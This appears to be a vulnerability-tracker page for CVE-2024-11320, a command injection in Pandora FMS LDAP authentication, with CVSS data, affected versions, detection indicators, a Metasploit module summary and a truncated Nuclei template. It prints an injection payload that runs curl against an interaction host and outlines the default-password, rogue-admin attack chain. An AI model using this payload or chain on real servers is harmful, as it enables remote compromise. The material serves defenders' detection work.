CVE-2024-11320
published 2024-11-21CVE-2024-11320: Arbitrary commands execution on the server by exploiting a command injection vulnerability in the LDAP authentication mechanism. This issue affects Pandora…
PriorityP189critical9.8CVSS 3.1
AVNACLPRNUINSUCHIHAH
EXPLOIT
EPSS
90.51%
99.8th percentile
Arbitrary commands execution on the server by exploiting a command injection vulnerability in the LDAP authentication mechanism. This issue affects Pandora FMS: from 700 through <=777.4
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| pandora_fms | pandora_fms | 700 – 777.4 | — |
| pandorafms | pandora_fms | >= 700 < 777.5 | 777.5 |
Detection & IOCsextracted from sources · hover to see the quote
urlPOST /index.php?login=1
urlGET /index.php?logged=1&sec=general/logon_ok
urlGET /index.php?sec=general&sec2=godmode/setup/setup§ion=auth
urlPOST /index.php?sec=general&sec2=godmode/setup/setup§ion=auth
commandldap_admin_login=';curl xxxxzz.{{interactsh-url}} #
path/index.php?sec=general&sec2=godmode/setup/setup§ion=auth
- →Exploit POST to /index.php?sec=general&sec2=godmode/setup/setup§ion=auth with Content-Type application/x-www-form-urlencoded containing injected shell metacharacters in the ldap_admin_login parameter (e.g., ';curl ...) indicates active exploitation of CVE-2024-11320.
- →Successful exploitation response contains the string 'Correctly updated the setup options' after injecting the malicious LDAP admin login payload.
- →Attacker sets auth=ldap and fallback_local_auth=1 in the setup POST body as part of the injection chain; monitor for these parameters being set together with shell metacharacters in ldap_admin_login.
- →The Metasploit module leverages a default DB password to create a new admin user in MySQL before exploiting the LDAP command injection; monitor for unexpected MySQL connections from external IPs and new admin user creation in Pandora FMS. ↗
- →The attack chain includes a GET to /index.php?login=1 with cookies disabled after injecting the payload, which triggers the LDAP authentication and executes the injected command server-side.
- →Affected versions are Pandora FMS v7.0NG.718 through v7.0NG.777.4; presence of these versions combined with exposed MySQL port and admin web access indicates high risk. ↗
- ·Exploitation requires admin-level access to the Pandora FMS web application. The Metasploit module achieves this via a default MySQL database password to create a rogue admin account, so the MySQL port must be exposed for the full automated attack chain to work remotely. ↗
- ·The injection point is specifically the ldap_admin_login field in the LDAP authentication configuration page; the vulnerability is only reachable when LDAP authentication is being configured or updated. ↗
CVSS provenance
nvdv3.19.8CRITICALCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvdv4.06.9MEDIUMCVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:P/VC:L/VI:H/VA:L/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:P/AU:N/R:U/V:C/RE:M/U:Amber
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No advisories linked to this vulnerability.
No detection rules found.
Metasploit
Pandora FMS authenticated command injection leading to RCE via LDAP using default DB password
metasploit
Pandora FMS authenticated command injection leading to RCE via LDAP using default DB password
Pandora FMS authenticated command injection leading to RCE via LDAP using default DB password
Pandora FMS is a monitoring solution that provides full observability for your organization's technology. This module exploits an command injection vulnerability in the LDAP authentication mechanism of Pandora FMS. You need have admin access at the Pandora FMS Web application in order to execute this RCE. This access can be achieved leveraging a default password vulnerability in Pandora FMS that allows an attacker to access the Pandora FMS MySQL database, create a new admin user and gain administrative access to the Pandora FMS Web application. This attack can be remotely executed over the WAN as long as the MySQL services are exposed to the outside world. This issue affects Community, Free and E
Nuclei
Pandora v7.0NG.777.3 - Remote Code Execution
nuclei·CVSS 6.9
CVE-2024-11320 [MEDIUM] Pandora v7.0NG.777.3 - Remote Code Execution
Pandora v7.0NG.777.3 - Remote Code Execution
Arbitrary commands execution on the server by exploiting a command injection vulnerability in the LDAP authentication mechanism.This issue affects Pandora FMS- from 700 through '
internal: true
- raw:
- |
POST /index.php?login=1 HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
nick={{username}}&pass={{password}}&login_button=Let%27s+go&csrf_code={{csrf_code}}
matchers:
- type: dsl
dsl:
- status_code == 302
- contains(set_cookie, 'PHPSESSID=')
condition: and
internal: true
- raw:
- |
GET /index.php?logged=1&sec=general/logon_ok HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- status_code == 200
- contains(body, 'Server health')
condition: and
internal: true
- raw:
- |
GET /index.php?sec=general&sec2=godmo
No writeups or analysis indexed.
2024-11-21
Published